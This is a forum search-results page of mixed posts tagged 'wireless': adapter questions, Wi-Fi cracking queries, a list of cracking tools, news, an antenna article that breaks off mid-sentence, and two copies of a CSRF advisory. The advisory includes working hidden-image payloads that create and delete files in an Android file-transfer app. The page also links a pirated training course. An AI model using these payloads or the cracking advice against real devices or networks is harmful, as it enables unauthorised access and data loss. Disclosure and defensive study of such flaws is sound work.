Jump to content

Search the Community

Showing results for tags 'wireless'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges
    • Bug Bounty
    • Programare
    • Reverse engineering & exploit development
    • Mobile phones
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Fake News Romania
    • Sugestii
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Categories

There are no results to display.

There are no results to display.

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 21 results

  1. Buna! De ceva timp caut adaptoare pt Kali Linux (cea mai noua versiune, 2020) pt wireless pentesting. Sa pot sa dau enable la monitor mode, packet sniffing tot ce ar trebui sa faca un adaptor decent in zilele noastre. (nu am pretentie si la 5G neaparat). Stiu de celebrele adaptoare de la Alfa Networking doar ca in romania nu gasesti spre exemplu un Alfa AWUS036NHA ,sau cam orice de la ei. Am cumparat un tp-link tl-wn722n insa am aflat in cele din urma ca nu este V1 (nu s-a specificat nicaieri pe site-ul de unde l-am luat, primind un v3) asa ca urmeaza sa il returnez. Doresc sa evit sa comand de afara in perioada aceasta deci as dori niste adaptoare decente (mai de incepatori spre average useri) care sa nu coste mai mult de 150-170 (poate pana la 200 lei insa la asta ma mai gandesc. Puteti lasa recomandari pana in 200 , conteaza sa fie din romania). Pot achizitiona si un 2nd hand daca e neaparat insa as risca sa primesc un Alfa fake din cate am vazut. Multumesc!!!
  2. Salutare tuturor Revin si eu cu cateva intrebari legate de wi-fi pen. Deci am parcurs urmatorii pasi: Metoda 1 Am luat o Alfa pe care am conectat-o la Kali linux dupa care am scanat cateva retele wi-fi si am obtinut cateva handshake-uri pentru respectivele retele dupa care am exportat acele handshake-uri si le-am copiat pe windows 10 unde am Aircrack (toate bune si frumoase pana aici). Am importat in Aircrack fisierul ce contine acel handshacke am selectat encriptia si key size 64, o lansez dar programul imi spune ca am doar 150 iv's si sa incerc cu minim 5000 iv's. Ce sunt acele iv's si cum le obtin? Cumva sunt pachete ? Momentan am ales sa incerc cracking-ul acelui handshacke cu un wordlist destul de mare (2GB) dar cuvintele sunt in engleza deci sunt sceptic ca va functiona, daca gasesc un wordlist in romana voi incerca si cu el. Metoda 2 Aceeasi placa de retea + CommView for WiFi apoi scanat reteaua targhetata (Doar 5 minute pentru ca trial and yeah), capturat un log (cateva pachete etc) , convertit fisierul ca sa poata fi rulat de aircrack si primesc acelasi mesaj ca in Metoda cu Linux. Ai mai ramas intrebarile de mai sus, Ce sunt acele iv's si cum le obtin? Cumva sunt pachete ? Pot scana cu altceva retelele pentru a obtine un log mai mare si mai multe pachete in speranta ca o sa prin 5k iv's din acelea (daca da cum sau cu ce soft) ? Astept raspuns de la cei care au mai multe cunostinte despre asa ceva Multumesc anticipat!
  3. Buna tuturor. Este prima mea postare pe acest forum desi sunt activ pe acest site de mai bine de un an. Eu momentan stau in caminul studentilor, singura mea conectare la internet este printr-un wireless "gol, golut.". Adica imi este pus pe tava un wireless nesecurizat ceea ce inseamna ca cineva poate accesa datele mele personale intru-un mod mult prea usor. Prin asta as vrea sa va intreb cum as putea sa "sparg" o parola wireless prin alta metoda mai eficienta decat Backtracking sau daca stie cineva un VPN free de calitate (ma indoiesc sa existe unul free de calitate ). Multumesc. O zi faina tuturor.
  4. Salut. Am tot cautat pe forum si nu am gasit nimic concret, poate nu am inteles eu, dar sper sa gasesc aici raspunsul de care am nevoie. Eu sunt din provincie, urmez o facultate si stau la un camin in chirie. Toate bune si frumoase, doar ca acest camin nu are internet. Caminul e pozitionat pe langa o benzinarie, Mcdonald's etc. Foarte multe retele wireless gratuite. Am gasit pe forum informatii despre antene wireless Alfa, Tp-link etc. Am vazut si pe emag modele de antene, etc. Intrebarea mea este: Cum pot face sa prind wifi de pe laptopul meu ? Pe mine ma intereseaza sa am wireless in camera, nu sa ma conectez prin usb prin acele adaptopare,sau daca merge sa conectez mai multe device-uri din router prin cablu de internet . Mai exact, cum functioneaza toate astea, sper sa se inteleaga.Va multumesc!
  5. Salut Deci, vreau sa fac, cum scrie si in descriere, un receiver (pt. PC) pentru un controller de Xbox 360 (wireless). Acum eu am gasit un video care explica toti pasii, problema este ca eu am alt model de placuta electronica si difera circuitele... Acesta este video-ul pe care l-am gasit cu ce vreau sa fac: Aceasta este placuta mea luata dintr-un Xbox 360 model din 2010: Imgur: The most awesome images on the Internet Deci, daca poate sa ma ajute cineva, raman recunoscator...
  6. The wireless industry continues to grow in leaps and bounds with more and more gadgets evolving to be wireless. Wireless access points, media centers, phones, and even security systems are commonplace in the average household. Unfortunately, the security that is implemented on this equipment is often lacking, opening the devices syto severe security vulnerabilities. In practice, many companies and organizations still use and deploy vulnerable wireless gear, often in their default configurations. This is most often due to poor security awareness or a lack of understanding of the risks and ramifications. Download: https://www.dropbox.com/s/bi60f383g4phbuu/Offensive%20Security%20Wireless%20Attacks%20-%20WiFu%20v3.0.7z?dl=0 pwd: rstforums.com
  7. The nation’s first ever criminal case involving a hijacked wireless Internet connection came to light this month, prompting online security experts to warn that home Wi-Fi routers may be open to attack if not properly protected. Users need to set a password and switch on encryption, or their network can be hacked within minutes by someone close enough to eavesdrop on the wireless signal, such as a user in an adjacent apartment, said Yuichi Nozawa, a consultant with the government-affiliated Information-technology Promotion Agency (IPA), a body that advises on digital security. Cracking the security itself is relatively simple for one common form of encryption and can be done using free software. The IPA delivered the warning last Friday, a day after the rearrest of a man suspected of tapping into a nearby Wi-Fi network in Matsuyama, Ehime Prefecture. Hirofumi Fujita, 30, is separately on trial for allegedly stealing ¥16 million by obtaining online banking IDs and passwords as well as sending computer viruses to gain unauthorized remote access to other people’s computers. Moreover, the agency warned that hackers can use hijacked wireless networks to hide their identities, leading “even ordinary people with no criminal intention” to become the main suspects in cybercrimes, Nozawa said Monday. He said police sometimes identify suspects by the Internet access point used. A further problem lies in the fact that it is not easy for ordinary users to detect if their network has been hacked, he said. Many users remain unaware of the risks. In 2014, the IPA reported that more than 50 percent of households either had not set password protection on their home wireless network or were unsure whether it was active. But even if a wireless network is password-protected, it needs to use a newer form of encryption, as older ones can be cracked fairly easily. Older routers may offer Wired Equivalent Privacy (WEP) encryption as the default setting, which Nozawa said can be hacked. The alleged Ehime hacker is suspected of using this technique, deploying software that came as a free gift with an IT security magazine. Instead, Nozawa recommends using Wi-Fi Protected Access II, better known as WPA2, a higher form of encryption and one usually offered by newer network devices. The IPA recommends contacting manufacturers’ support teams to find out how to configure the security settings, as the procedure varies from device to device. Source
  8. Pret: 150. Modalitate de contact: PM. Modalitate de plata: La predare. Garantie: Da. Cantitate: 1. Oras: Bucuresti. Modalitate de livrare: Predare personala. Verbatim MediaShare Wireless. Produsul este nou . Sigilat! POZE
  9. Top 10 Free Wireless Network hacking tools for ethical hackers and businesses
  10. EvilAP_Defender is an application that helps wireless network administrator to discover and prevent Evil Access Points (AP) from attacking wireless users. The application can be run in regular intervals to protect your wireless network from Evil Twin like attacks. By configuring the tool you can get notifications sent to your email whenever an evil access point is discovered. Additionally you can configure the tool to perform DoS on discovered evil AP in order to give the administrator more time to react. However, notice that the DoS will only be performed for evil APs which have the same SSID but different BSSID (AP’s MAC address) or running on a different channel. This to avoid DoS your legitimate network. The tool is able to discover evil APs using one of the following characteristics: * Evil AP with a different BSSID address * Evil AP with the same BSSID as the legitimate AP but a different attribute (including: channel, cipher, privacy protocol, and authentication) * Evil AP with the same BSSID and attributes as the legitimate AP but different tagged parameter - mainly different OUI (tagged parameters are additional values sent along with the beacon frame. Currently no software based AP gives the ability to change these values. Generally software based APs are so poor in this area). Whenever an Evil AP is discovered the tool will alert the admin through email (SMS will be supported soon). Additionally the tool will enter into preventive mode in which the tool will DoS the discovered Evil AP. The tool can be configured easily by starting in what we call “Learning Mode”. In this mode you can whitelist your legitimate network. This can be done by following the wizards during the Learning Mode. You can also configure the preventive mode and admin notification from there as well. Finally, you need to change into Normal Mode or re-run the tool in this mode in order to start discovering Evil APs. Requirements: - Aircrack-ng suite - Your wireless card must be supported by Aircrack-ng. Check the following URL: compatibility_drivers [Aircrack-ng] - MySQL - Python Learning Mode: This Mode can be invoked with the “-L” switch. When running the tool in this mode the tool will start by scanning for the available wireless networks. Then it lists all the found wireless networks with whitelisted APs colored with green. It also lists the whitelist APs and OUIs (tagged parameters). The tool also provides several options which allow you to add/remove SSIDs into/from whitelist. You need to whitelist your SSID first before running the tool in the Normal Mode. Moreover, you can configure Preventive Mode from “Update options -> Configure Preventive Mode”. First you need to set the Deauthentication time (in seconds) into a number bigger than 0 (setting the value to 0 will disable this mode). Then you need to set the number of time to repeat the attack. This is so important for attacking more than Evil AP because the tool cannot attack all of them in the same time (how can you attack several APs on different channels? Later on we will improve the tool and allow it to attack (in the same time) several APs in the same channel). The tool will attack the first Evil AP for specified deauthentication time then it will stop and attack the second one and so on. Be careful from increasing the Deatuth time so much because this may attack only one AP and leaving the others running. My recommendation is to set the Deauth time to something suitable such as 10 seconds and increasing the repeat time. Finally, you can configure admin notification by setting admin email, SMPT server address, SMTP username (complete email address) for authentication purpose, and SMTP password. You can use any account on Gmail or your internal SMTP server account. Normal Mode: This is the mode in which the tool starts to discover Evil APs and notify the administrator whenever one is discovered. This mode can be invoked by “-N” switch. Feedback: Feedback is always welcomed on the tool git or through my email: moha99sa at yahoo dot com. Download Source
  11. Document Title: =============== Wireless File Transfer Pro Android - CSRF Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1437 Release Date: ============= 2015-02-25 Vulnerability Laboratory ID (VL-ID): ==================================== 1437 Common Vulnerability Scoring System: ==================================== 2.3 Product & Service Introduction: =============================== Wireless File Transfer Pro is the advanced version of Wireless File Transfer. (Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.lextel.WirelessFileTransferPro ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered multiple cross site request forgery web vulnerabilities in the Wireless File Transfer Pro v1.0.1 mobile android application. Vulnerability Disclosure Timeline: ================================== 2015-02-25: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Lextel Technology Product: Wireless File Transfer Pro - (Android) Web Application UI 5.9.5 - 1.0.1 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ Multiple cross site request forgery issues has been discovered in the Wireless File Transfer Pro 1.0.1 android mobile web-application. The mobile web-application is vulnerable to a combination of cross site request forgery and local command injection attacks. Proof of Concept (PoC): ======================= The vulnerabilities can be exploited by remote attackers without privileged application user account and with medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Create New Folder <img src="http://192.168.1.2:8888/fileExplorer.html?action=create&type=folder&folderName=test1" width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /fileExplorer.html?action=create&type=folder&folderName=test1 HTTP/1.1 Host: 192.168.1.2:8888 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard Connection: keep-alive HTTP/1.1 200 OK Cache-control: no-cache Content-length: 4 <a href="#" onclick="actionBrower('/sdcard/test1')">test1</a></td></td><td width="24%"></td><td width="24%">2015-02-09 18:12:19</td><td width="15%"> Delete File, Folder <img src="http://192.168.1.2:8888/fileExplorer.html?action=deleteFile&fileName=test""width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /fileExplorer.html?action=deleteFile&fileName=test HTTP/1.1 Host: 192.168.1.2:8888 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard Connection: keep-alive HTTP/1.1 200 OK Cache-control: no-cache Content-length: 30 Reference: http://localhost:8888/ Security Risk: ============== The security risk of the cross site request forgery web vulnerability in the create and delete function is estimated as medium. (CVSS 2.3) Credits & Authors: ================== Hadji Samir [s-dz@hotmail.fr] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source
  12. Internet is now the basic need of our daily life. With the increasing use of smartphones, most of the things are now online. Every time we have to do something, we just use our smartphone or desktop. This is the reason wi-fi hotspots can be found everywhere. People also use wireless in their home network to connect all devices. Every person can see the neighborhood wi-fi networks in the system, and they want to use it for free. But most these networks are secured with a password key. You need to know this security key to access the network. When your own network is down, you will desperately want to connect to these neighborhood networks. For this, people generally search for wi-fi password cracking tools to get unauthorized access to those wireless networks. Sometimes when you are on a network, you also want to check what is happening on the network. This happens mostly in big organizations, when an employer wants to check who is doing what in the network. For these things, there are a few network hacking tools available that let users analyze packets and see what other users are doing. In this article, I am going to discuss wireless security and best wi-fi password cracking or recovery tools. I will explain the kind of encryption wireless networks use and how these tools can crack the networks to get access. We will also see what tools let users monitor networks. Wireless Networks and Hacking Wireless networks are based on IEEE 802.11 standards defined by IEEE(Institute of Electrical and Electronics Engineers) for ad hoc networks or infrastructure networks. Infrastructure networks have one or more access points which coordinate the traffic between the nodes. But in ad hoc networks, there is no access point; each node connects in a peer-to-peer way. Basically there are two types of vulnerabilities which can be found in the Wireless LAN. One is poor configuration and the other is poor encryption. Poor configuration is caused by the network admin who manages the network. It may include the weak password, no security settings, use of default configurations, and other user related things. Poor encryption is related to security keys used to protect the wireless network. It is there because of issues in WEP or WPA. WEP and WPA WEP and WPA are the two main security protocols used in Wi-Fi LAN. WEP is known as Wired Equivalent Privacy (WEP). It is a deprecated security protocol which was introduced back in 1997 as a part of original 802.11 standards. But it was weak, and several serious weakness were found in the protocol. Now, this can be cracked within minutes. So, a new kind of security protocol was introduced in 2003. This new protocol was Wi-Fi Protected Access (WPA). It has mainly two versions, 1 and 2 (WPA and WPA2). Now it is the current security protocol used in wireless networks. To get unauthorized access to a network, one needs to crack these security protocols. There are many tools which can crack Wi-Fi encryption. These tools can either take advantage of WEP weaknesses or use bruteforce attacks on WPA/WPA2. I am sure now you know that you should never use WEP security. Basically wireless hacking tools are of two types. One of which can be used to sniff the network and monitor what is happening in the network. And other kinds of tools are used to hack WEP/WPA keys. These are the popular tools used for wireless password cracking and network troubleshooting. 1. Aircrack Aircrack is one of the most popular wireless passwords cracking tools which you can use for 802.11a/b/g WEP and WPA cracking. Aircrack uses the best algorithms to recover wireless passwords by capturing packets. Once enough packets have been gathered, it tries to recover the password. To make the attack faster, it implements a standard FMS attack with some optimizations. The company behind the tool also offers an online tutorial where you can learn how to install and use this tool to crack wireless passwords. It comes as Linux distribution, Live CD and VMware image options. You can use any of these. It supports most of the wireless adapters and is almost guaranteed to work. If you are using a Linux distribution, the only drawback of the tool is that it requires deeper knowledge of Linux. If you are not comfortable with Linux, you will find it hard to use this tool. In this case, try Live CD or VMWare image. VMWare Image needs less knowledge, but it only works with a limited set of host OS, and only USB devices are supported. Before you start using this too, confirm that the wireless card can inject packets. Then start WEP cracking. Read the online tutorial on the website to know more about the tool. If you will follow steps properly, you will end up getting success with this tool. Download: http://www.aircrack-ng.org/ 2. AirSnort AirSnort is another popular tool for decrypting WEP encryption on a wi-fi 802.11b network. It is a free tool and comes with Linux and Windows platforms. This tool is no longer maintained, but it is still available to download from Sourceforge. AirSnort works by passively monitoring transmissions and computing encryption keys once it has enough packets received. This tool is simple to use. If you are interested, you can try this tool to crack WEP passwords. Download: http://sourceforge.net/projects/airsnort/ 3. Cain & Able Cain & Able is a popular password cracking tool. This tool is developed to intercept network traffic and then discover passwords by bruteforcing the password using cryptanalysis attack methods. It can also recover wireless network keys by analyzing routing protocols. It you are trying to learn wireless security and password cracking, you should once try this tool. Download: http://www.oxid.it/cain.html 4. Kismet Kismet is the wi-fi 802.11 a/b/g/n layer2 wireless network sniffer and IDS. It works with any wi-fi card which supports rfmon mode. It passively collects packets to identify networks and detect hidden networks. It is built on client/server modular architecture. It is available for Linux, OSX, Windows and BSD platforms. Download: http://www.kismetwireless.net/ 5. NetStumbler NetStumbler is a popular Windows tool to find open wireless access points. This tool is free and is available for Windows. A trimmed down version of the tool is also available. It is called MiniStumbler. Basically NetStumblet is used for wardriving, verifying network configurations, finding locations with a poor network, detecting unauthorized access points, and more. But the tool also has a big disadvantage. It can be easily detected by most of the wireless intrusion detection systems available. This is because it actively probes a network to collect useful information. Another disadvantage of the tool is that it does not work properly with the latest 64 bit Windows OS. This is because the tool was last updated back in April 2004. It has been around 11 years since the last stable release of the tool. Download Netstumbler: http://www.stumbler.net/ 6. inSSIDer inSSIDer is a popular Wi-Fi scanner for Microsoft Windows and OS X operating systems. Initially the tool was opensource. Later it became premium and now costs $19.99. It was also awarded as “Best Opensource Software in Networking”. The inSSIDer wi-fi scanner can do various tasks, including finding open wi-fi access points, tracking signal strength, and saving logs with GPS records. Download inSSIDer: http://www.inssider.com/ 7. WireShark WireShark is the network protocol analyzer. It lets you check what is happening in your network. You can live capture packets and analyze them. It captures packets and lets you check data at the micro-level. It runs on Windows, Linux, OS X, Solaries, FreeBSD and others. WireShark requires good knowledge of network protocols to analyze the data obtained with the tool. If you do not have good knowledge of that, you may not find this tool interesting. So, try only if you are sure about your protocol knowledge. Download Wireshark: https://www.wireshark.org/ 8. CoWPAtty CoWPAtty is an automated dictionary attack tool for WPA-PSK. It runs on Linux OS. This program has a command line interface and runs on a word-list that contains the password to use in the attack. Using the tool is really simple, but it is slow. That’s because the hash uses SHA1 with a seed of SSID. It means the same password will have a different SSIM. So, you cannot simply use the rainbow table against all access points. So, the tool uses the password dictionary and generates the hack for each word contained in the dictionary by using the SSID. The new version of the tool tried to improve the speed by using a pre-computed hash file. This pre-computed file contains around 172000 dictionary file for around 1000 most popular SSIs. But if your SSID is not in those 1000, you are unlucky. Download CoWPAtty: http://sourceforge.net/projects/cowpatty/ 9. Airjack Airjack is a Wi-Fi 802.11 packet injection tool. This wireless cracking tool is very useful in injecting forged packets and making a network down by denial of service attack. This tool can also be used for a man in the middle attack in the network. Download AirJack: http://sourceforge.net/projects/airjack/ 10. WepAttack WepAttack is an open source Linux tool for breaking 802.11 WEP keys. This tool performs an active dictionary attack by testing millions of words to find the working key. Only a working WLAN card is required to work with WepAttack. Download WebAttack: http://wepattack.sourceforge.net/ 11. OmniPeek OmniPeek is another nice packet sniffer and network analyzer tool. This tool is commercial and supports only Windows operating systems. This tool is used to capture and analyze wireless traffic. But it requires you to have good knowledge of protocols to properly understand things. A good thing is that the tool works with most of the network interface cards available in market. This tool is used for network troubleshooting. This tool also supports plugins, and 40 plugins are already available to extend the features of the tool. Download: http://www.wildpackets.com/products/distributed_network_analysis/omnipeek_network_analyzer 12. CommView for WiFi CommView for WiFi is another popular wireless monitor and packet analyzer tool. It comes with an easy to understand GUI. It works fine with 802.11 a/b/g/n/ac networks. It captures every packet and displays useful information as a list. You can get useful information like access points, stations, signal strength, network connections and protocol distribution. Captured packets can be decrypted by user-defined WEP or WPA keys. This tool is basically for wi-fi network admins, security professionals, and home users who want to monitor their wi-fi traffic and programmers working on software for wireless networks. Download CommView: http://www.tamos.com/products/commwifi/ 13. CloudCracker CloudCracker is the online password cracking tool for cracking WPA protected wi-fi networks. This tool can also be used to crack different password hashes. Just upload the handshake file, enter the network name and start the tool. This tool has a huge dictionary of around 300 million words to perform attacks. Try Cloudcracker: https://www.cloudcracker.com/ Conclusion In this post, I discussed 13 wireless hacking tools. A few wireless hacking tools are for cracking the password to get unauthorized access, and a few are for monitoring and troubleshooting the network. But most of the people really interested in tools to crack wireless hotspots just want to get free Internet access. The above collection also contains those tools which try a dictionary attack to crack wi-fi passwords to allow you to get free Internet access. But be sure not to use these tools in a risky place. Hacking wireless networks to get unauthorized access may be a crime in your country. You may get into trouble for using these tools. So, please do not use these tools for illegal works. As I already mentioned, you should never use the WEP encryption key in your home or wireless network. With available tools, it is child’s play to crack the WEP keys and access your wi-fi network. Wireless monitoring and troubleshooting tools are basically for network admins and programmers working on wi-fi based software. These tools really help when some of your systems face problems in connecting to the network. I hope you enjoyed this article and got relevant information about popular wireless hacking and password cracking tools. I tried my best to compile this list of password hacking tools, but as a human error, I may miss something. If I forgot any important tool in this, please let me know in the comments. Source
  13. Document Title: =============== Wireless File Transfer Pro 1.0.1 - (Android) CSRF Remote Command Execution (Creat, Delete) Release Date: ============= 2015-02-10 Product & Service Introduction: =============================== Wireless File Transfer Pro is the advanced version of Wireless File Transfer. (Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.lextel.WirelessFileTransferPro ) Affected Product(s): ==================== Wireless File Transfer Pro 5.9.5 - (Android) Web Application 1.0.1 Lextel Technology Exploitation Technique: ======================= Remote Severity Level: =============== Medium Request Method(s): [+] [GET] Vulnerable Module(s): [+] browse Vulnerable Parameter(s): [+] fileExplorer.html? Affected Module(s): [+] Index of Documents (http://localhost:8888) Technical Details & Description: ================================ cross site request forgery has been discovered in the Wireless File Transfer Pro 1.0.1 Android mobile web-application. The mobile web-application is vulnerable to a combination of cross site request forgery and local command injection attacks. Proof of Concept (PoC): ======================= Creat New Folder <img src="http://192.168.1.2:8888/fileExplorer.html?action=create&type=folder&folderName=test1" width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /fileExplorer.html?action=create&type=folder&folderName=test1 HTTP/1.1 Host: 192.168.1.2:8888 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard Connection: keep-alive HTTP/1.1 200 OK Cache-control: no-cache Content-length: 4 <a href="#" onclick="actionBrower('/sdcard/test1')">test1</a></td></td><td width="24%"></td><td width="24%">2015-02-09 18:12:19</td><td width="15%"> Delete File, Folder <img src="http://192.168.1.2:8888/fileExplorer.html?action=deleteFile&fileName=test""width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /fileExplorer.html?action=deleteFile&fileName=test HTTP/1.1 Host: 192.168.1.2:8888 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard Connection: keep-alive HTTP/1.1 200 OK Cache-control: no-cache Content-length: 30 Reference: http://localhost:8888/ Security Risk: ============== The security risk of the cross site request forgery issue and command injection vulnerability is estimated as medium. (CVSS 4.4) Credits & Authors: ================== Hadji Samir s-dz@hotmail.fr Source
  14. Introduction Wardriving is an activity in which a person seeks wireless access points in moving vehicles with high gain antennas mounted on the top. Usually, this access point data is correlated with GPS positions and marked on publicly accessible maps such as WiGLE. On the other hand, wireless penetration tests are focused evaluations of wireless security pertaining to an organization. In both of these cases—and any type of wireless communication—antennas play a critical role. They can mean the difference between hassle-free communication and bitter frustration. However, antenna designs and related implications are arcane topics in requirement of sincere exploration by security enthusiasts. The antennas in your arsenal can make or break your wardriving or wireless penetration testing efforts. Whether you are a wardriving aficionado or a wireless penetration tester, this paper is intended to help you deduce the best antenna for your requirements. Terminology You Should Know Wi-Fi operates in the 2.4 GHz radio frequency that is measured in decibels or db. In order to be able to comprehend discussions germane to the performance of antennas, you must familiarize yourself with the following terms: dBm – dBm means decibel milliwatts. Wi-Fi network signal levels are usually measured using dBm. The negative sign is used because the transmission power is never strong enough for the signal level to be positive. For instance, to get a 0.00 dBm signal, you would need a transmission power of 0.001 watts. -30 dBm- Maximum possible value; you are right next to the access point (within a few feet). -67 dBm- Minimum requirement for timely packet delivery (e.g. for VoIP or video streaming). -70 dBm- Minimum requirement for reliable packet delivery (e.g. for web surfing). -80 dBm- Minimum requirement for maintaining a basic connection; you will experience some packet drops. -90 dBm- Barely able to maintain a connection; SNR is low; functionality is severely impaired. Link Quality: Simply stated, link quality is indicative of the SNR (Signal to Noise Ratio), which is a measurement of interference versus the strength of your ‘point-to-point’ or ‘point-to-multipoint’ link. Accordingly, higher link quality will imply lower number of packet errors. Antenna Gain: Do not be confused by this term, the antenna does not actually amplify anything. Antenna gain is a figure that reflects how efficiently your receiving antenna would convert Wi-Fi radio waves into electrical power. Antennas with a gain of 2 dBi, 5 dBi, 7dBi, 9 dBi, 13 dBi etc are available. A common mistake is to think that the one with a high dBi would be the best (e.g. 13 dBi). To understand why this is a misconception, consider the following rough sketch [Figure 1]: As evident from this figure, a higher (9) dBi antenna is suitable for long horizontal ranges with the receiver and transmitter at roughly the same elevation. However, if the transmitter is placed vertically above the receiver—as in floors of a building—then a 5 dBi antenna would be your best bet. If the transmitter is at a different elevation and at a long distance from the receiver, a 7 dBi antenna would offer you the right combination of elevation and range. A 2 dBi antenna aims to cover signals equally in all directions, and is not well-suited for wireless penetration testing or wardriving. How well do these antennas work? The short answer is: If correctly chosen, they perform well. The right type of antenna, with proper orientation, is able to pick up signals from miles away. However, it is imperative to point out here that many users who purchase external antennas end up being dissatisfied with their performance. The reasons for this are: Unrealistic expectations: This may seem obvious but these antennas are not magical devices that will pick up signals from great distances, especially when they are improperly chosen (wrong type of antenna) or have not been calibrated (aligned) well. Insufficient knowledge: If you are purchasing a wireless antenna, or constructing a custom one, you should be able to define your purpose and have the knowledge to choose the proper antenna that would satisfy this purpose. To test how well an external antenna performs in contrast with a laptop’s default antenna under the same conditions, we set up the following experiment. The distance between the access point and our antennas was carefully chosen so that the internal antenna could barely receive a signal at this point. Interfaces: ‘wlan0?- internal antenna, ‘wlan1?- external antenna, omnidirectional, 5 dBi Distance between AP and antennas: 7.62 meters or 25 feet Obstructions: Two concrete walls and two trees We noticed that at this distance, using the internal antenna, we were barely able to ping the wireless router at 192.168.0.1. As evident from the roundtrip delay time of several milliseconds [Figure 2], the internal antenna was performing poorly and there were multiple packet drops. At the same distance, our standard 5 dBi omidirectional external antenna was able to outperform the internal antenna, as evident by the decreased roundtrip delay time [Figure 3]. Let us examine the performance of both antennas in terms of link quality and signal levels. For the internal antenna, both the link quality and the signal level were extremely poor [Figure 4]. We were able to obtain a reliable connection using the external antenna under same conditions [Figure 5]. These results indicate that there is a definite performance boost when an external antenna is used—how significant this boost is would depend on the suitability of the antenna for the receiving conditions. This brings us to the next section. Choosing the Right Type of Antenna There are a variety of antenna types, and each type is built with specific needs in mind. There is no “best antenna for wardriving or penetration testing”. Understanding the design and purpose of each of these would help you choose the best one. An omnidirectional antenna spreads energy equally in all directions—which means shorter range. A directional antenna is able to take this same energy and focus it towards a particular direction—implying longer range in that direction. Omni-Directional Antennas This is the most common antenna type, and most if not all of you have seen one up close. For instance, 